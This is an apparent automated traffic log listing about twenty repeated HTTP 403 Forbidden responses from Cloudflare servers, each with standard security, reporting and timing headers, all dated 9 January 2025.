Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJxdSU9eA7ZQNHRTEccxJJt22mVhSRG%2FJYB9skKxEakL%2FfPXZLkvn9GK2wmF8r%2B6cvHif%2F2Xl%2BHvN1fvmxbJQCbi8M3PtkkzEcL9TkomU8CO0cpx8rMV6lw465I1DX81w0Wn%2FZ7ofBLGKhuK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2564f99de96-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1599&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1784841&cwnd=224&unsent_bytes=0&cid=dc00f30f93d6185f&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HoY%2FkqHvslayUVpp6DZoejhMWLVWY9f3h4OpVTEfqdB8%2Ff3vqpyfRuW5BetktGihOQfm9CbGT5rs20bLED9KfaGru3%2F5y1y08eirfAFPUmX73F8M%2BzhHeFGnrQifaNKOaf2C2AwE10Ncj82c"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c25a1bba433d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2338&min_rtt=2336&rtt_var=880&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1240441&cwnd=252&unsent_bytes=0&cid=47a36a094169e8c1&ts=146&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5PMLH%2BbhMKFmo%2BMq7y4TWwCuXYyYnhXClKxJwmTrpIfgwqQ6ll8uOAlxS1C5CN2WvDDeBuMQY4N6cnVZDC0qg%2FR13FcGa5Y34Mbq%2BTuXLOFkEgqfJeb2MU0FnNh6W8jK%2BNhamfM3rVDe6vc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c25ddfd2422d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1666&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1683967&cwnd=232&unsent_bytes=0&cid=4a05c57b0731d521&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMVaa8j4n%2Bz5lC%2FmbxBKvvShOW0Bt1vfePPF7VTh0Accjle%2F3s8IlxjTHzYwO6noBeBWvzAdst0XW3PNsL4kyqmWHOHjOUhOJuEMHmTIbGTmR1gH9DQ%2BwUQ%2BDc0JdJvo8I857G2Wy5FaYyBp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c261bb934392-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1574&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1692753&cwnd=234&unsent_bytes=0&cid=f524e06f0eea3a5d&ts=125&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXsqzGdu%2F0Ui0LgRn3I8laIdVj9yDZlzO31iYy%2B85zekPHgPqf9%2BBlR0h0PpX1V6tk%2FXOX7yj84arZ040384NXmag57fMA%2BOmaooCP2G1o1Ag1TaWM4kxEFlQYwL2EiS317sz8G4Fx5yZsp2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2656f410cba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=568&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1929940&cwnd=219&unsent_bytes=0&cid=9abe25fb72c1c942&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:14 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N8CGk3oZabKecIcwC61NUm%2Bl7dGcTK%2BFs1ouFYnMeCM2WqnJFIUOzov3jzBbOHf5uGR3QGvJXnkQTDzPN2FeDGfs0w07heAyUAJjis2F%2FQStkr4OV6kAMM32tVLnKfyjISnE2o5LmqGHmRf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c26909194261-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1865&min_rtt=1863&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1552365&cwnd=239&unsent_bytes=0&cid=a06c890e23bc8ed2&ts=124&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:14 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIX%2BFdADg5RGCdOGSNaKaug8FKdEd6h07KQrqXZqZhN8h%2BGLnpfbMnhu8ozm7TTjdqRtOGufAPWEkUdZGJ908%2BGjyglzNASl7uzbuwJTbf%2Fs5IdUVOTKD1a5E8IyiZIAb2gNvc9t3TKDAgap"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c26cfa31c481-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1631&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1682027&cwnd=236&unsent_bytes=0&cid=f796dde95388887f&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:15 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDPaAIT%2FIn3oRQh3TrSEF%2F3tbZhcrpcdYUekWYRl0q4aJWBiuApUzJvE64yfHOhGqqtDTZseNWZgz40%2F%2FEFK8vHKk8PSp6xd%2By1IHAtRDlQPSH4zEI8W97Jfl2%2BQPAOaAHjRiFYOmJoaIq%2BZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c270f8000c8e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1465&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1907250&cwnd=181&unsent_bytes=0&cid=9dbc02070f7f3fbb&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:15 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ifbkviXeXeQbXr8vRDasfcPMLtOOUtum6L11Eo0OH82Tk%2BsS7f%2BKEt6a%2BMsJj2o0%2FZYpv481IoJP0bBhACbVLuxoN8JO1FtzBMMkN78yq3%2FbZq0rpO9uAzCXxU9wgkpm217hdw3PrEkGqc3g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c274bfee42e8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1736&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1653454&cwnd=250&unsent_bytes=0&cid=a2288553c6e2f226&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HL%2BZRiuu%2Bmq3umDJ9FQNpRXvvxFrhlGTq0OB5V0WbxbJ%2FofNk9YcrtuSyPZUHzTrfp0%2Fx8tP05pKdenbJS%2BCM%2BC4U%2FX0wrX5k%2Fu5eaXwztS6%2FC%2BsOmGoGN6qsMtzOM%2Fn5HkcHkQuU5SU4lqZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c27889ad7cac-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1966&rtt_var=751&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1485249&cwnd=202&unsent_bytes=0&cid=c4496261ff2fcd38&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:17 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5xLAAn1kzRC1urpHAkP9fpgeKB45TmfVmB3m24xv8UapdZLl34V78PHAs3rmbpkQZE%2BOF3stmLRTJWaGBN70qFWEq3UfEVN%2B39oYrsnXDyNiul4t5PmLq29%2F5L4lUMcoDVa03YPy%2BVWuM2Dh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c27c58c941ad-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1718658&cwnd=189&unsent_bytes=0&cid=00100bee46c46216&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:17 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZ1fPwoK%2Bq4Mz1ynW2o6YQh3%2BZG1WjOXC5gvSf8C9ohEewxRFCRfqENSZ8SOCPxwC5Ahz%2BFUvPJWese6b%2Bx3J1g%2FYl5GA4NsHHXEhTZOaUs2dy%2FtuoQUZDGr8HSPIb4yUic%2BTQTqyUHwK%2FrF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2802a89438c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1563&rtt_var=591&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1842271&cwnd=245&unsent_bytes=0&cid=bf35463a8c396398&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:18 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BPl%2BR4e34umRQWdpxP5t3iS4aPTQi4Q3uOqlkINZl6CsPYqJ7xKX31GCJK2%2B1iTb6JROZjHqE%2F%2Ff0SFqIzlb0WAkvCz7n%2F7ywVp5IbNujUyvfxt%2FkjX2WY0edlzu7YfHk4oZp4ZfoBoOnI3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c28428db0c80-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1464&rtt_var=559&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1941489&cwnd=227&unsent_bytes=0&cid=173abd5e1de96032&ts=132&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:18 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFJiaPClLgSFjKbgR2mkyG2%2FaNNc6sTlUyhTNdl5bFtCN8OVm%2FpGAO3ahChVy8ZgPZ2I0JlzrQ6ts3pAyyZXJhNu7Hp%2FWP7V4mmfWtgbAETBWhGz1llu6UE6Sp9RQTkzFjvmk20b3xDlb2Og"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c287e918422b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2238&min_rtt=2222&rtt_var=866&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1240968&cwnd=220&unsent_bytes=0&cid=3be42c6b188632de&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:19 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FgxDKEgpofOmFUhGYdP71yLSoXox7W35uKzdb9zUfP5UM%2F8lQgKg1ZBcVBvgMmNY6Taef8KR3y0PcoW%2BJUzQr0I8RIeMa96b0nX8S3Y7QJ%2FpIpKi%2F%2FIyLY796O%2BtMmpBM7eB27qX7Aus%2B6V"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c28b9ad0729b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1962&rtt_var=755&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1431372&cwnd=250&unsent_bytes=0&cid=6c2291379b6a8c22&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:20 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GytLIhIxLNsIn2uVhFbo1236H%2FqsxtI1on1ISDLxqLyw7J%2FO%2F4oaCh1mICF3AhcWUsXNOLHbstmoFON%2BJcVahctLLUOsLlSRZWhdNbv%2F6LrT2HW6WC91ran3ANVDvr5Kag2T5T0GIn%2FlUnq5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c28f4fb443c3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2029&rtt_var=810&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1439132&cwnd=211&unsent_bytes=0&cid=0e8b2d77a7c2cbdc&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:20 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7doK3OW1D9bptHv1QP%2B0Q5YO6PJqBHTNFmAD8aV%2BQ5rNGSZqxr0IToSM7DNZtHJH3qHX1Z3EQOJmN%2BT6rI41FKkYXoJUMnxYYxZFVPZ9kR8AH8ge36vWlrn0iOoDFLYhVS%2FVanTIgNSqQoUH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2933f9243d9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1586&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1746411&cwnd=221&unsent_bytes=0&cid=48a2816a4bd230f9&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AQV2Uehil6L7VGgE7HK2QOgv2xORNf6Yr8iva4ZC6MRa3V907jfbCB4BzYtU3vXjVI3gnukg8XNuiBY1GlYdwrLwO7aERCKUTf2l46Hx39tVTz%2BImclv6UjQ4UBXtFhQlJ6Vg%2BcbNgGwqXwh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c296e8d517e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1641&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1716637&cwnd=232&unsent_bytes=0&cid=227cd384b546d3ab&ts=132&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OB3uuyalJRil%2BpIsNboXH87Yq%2Bi7VMEg1rPr9040exzP7gzdaKG%2FfZcJpw28DV3NNrzueuhWVgrL7YeztC3O4NMSjt5vb4Iear%2FAMiKaAo1WLmK3bo8sekeLEoYLVGSwoWvBgcHkm9D9rYw5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c29ac9e14238-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1754&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1652518&cwnd=244&unsent_bytes=0&cid=fd7e7b65f42210e4&ts=164&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sJoqX0YPnyQ1RcfwXmWpbAA63nQq5pMA9rbn4UDYGEc48wSroN6Zz7xRp2FTcbhB7Rgxcle2gCZ%2Fq76k9rUilx3tT%2Fn5e0bJHnUry4eujY3WLqJ8M79ezfY6Log5L%2BlX7E8LQjqhVkGE8ykn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c29ed9d27286-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2041&rtt_var=768&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1430671&cwnd=241&unsent_bytes=0&cid=68bf97fe60a99528&ts=154&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rrGJHSqbf9QUcW8wnW6bKHnI7blWYeZVUb5w3V6%2FWUpkflY%2F1V2WT1wgwiQVtlhm8Ligl5VzGqt2HPnC4d1sh5ZHFR7HQvybjKe34IhSMvtouYE4DrUeeWX7nlagXLPKcAXd3cfjPoaDKjt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2a2aa9a429e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1662&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1710603&cwnd=208&unsent_bytes=0&cid=87ef6095ef11c5a7&ts=130&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e0JE5jeQH7cyHNloElgAq8tbCAp5F41NZvvUjfMXeZFel908CXL6QnCZBjjAert2tTGowCwSs%2FAr6QMxhfxvuHVP5twXjwlywltZZ26GuB4K%2F3qm8olpwOaihNJWvwtupv9iWWKRRP1SmlCs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2a6af2a43e8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2385&min_rtt=2385&rtt_var=895&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1221757&cwnd=214&unsent_bytes=0&cid=28d19292cc656ce8&ts=162&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:24 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Mn1HXAhGe7lvDhbN02BwDgJPYKc268Qqw2z0dYlEOc4nhlRkIkwMNmluvkG%2FT3S7zVEU%2BNyOsFQdjB9U2OUNYhjzHaYk%2FoHRdeKIUAXX38q24%2BBVyGKY3aF6nxAbadRLsjquLLbMPCai5N1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2aa7b19437e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1537&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1837633&cwnd=238&unsent_bytes=0&cid=f43035afa2e14234&ts=130&x=0"
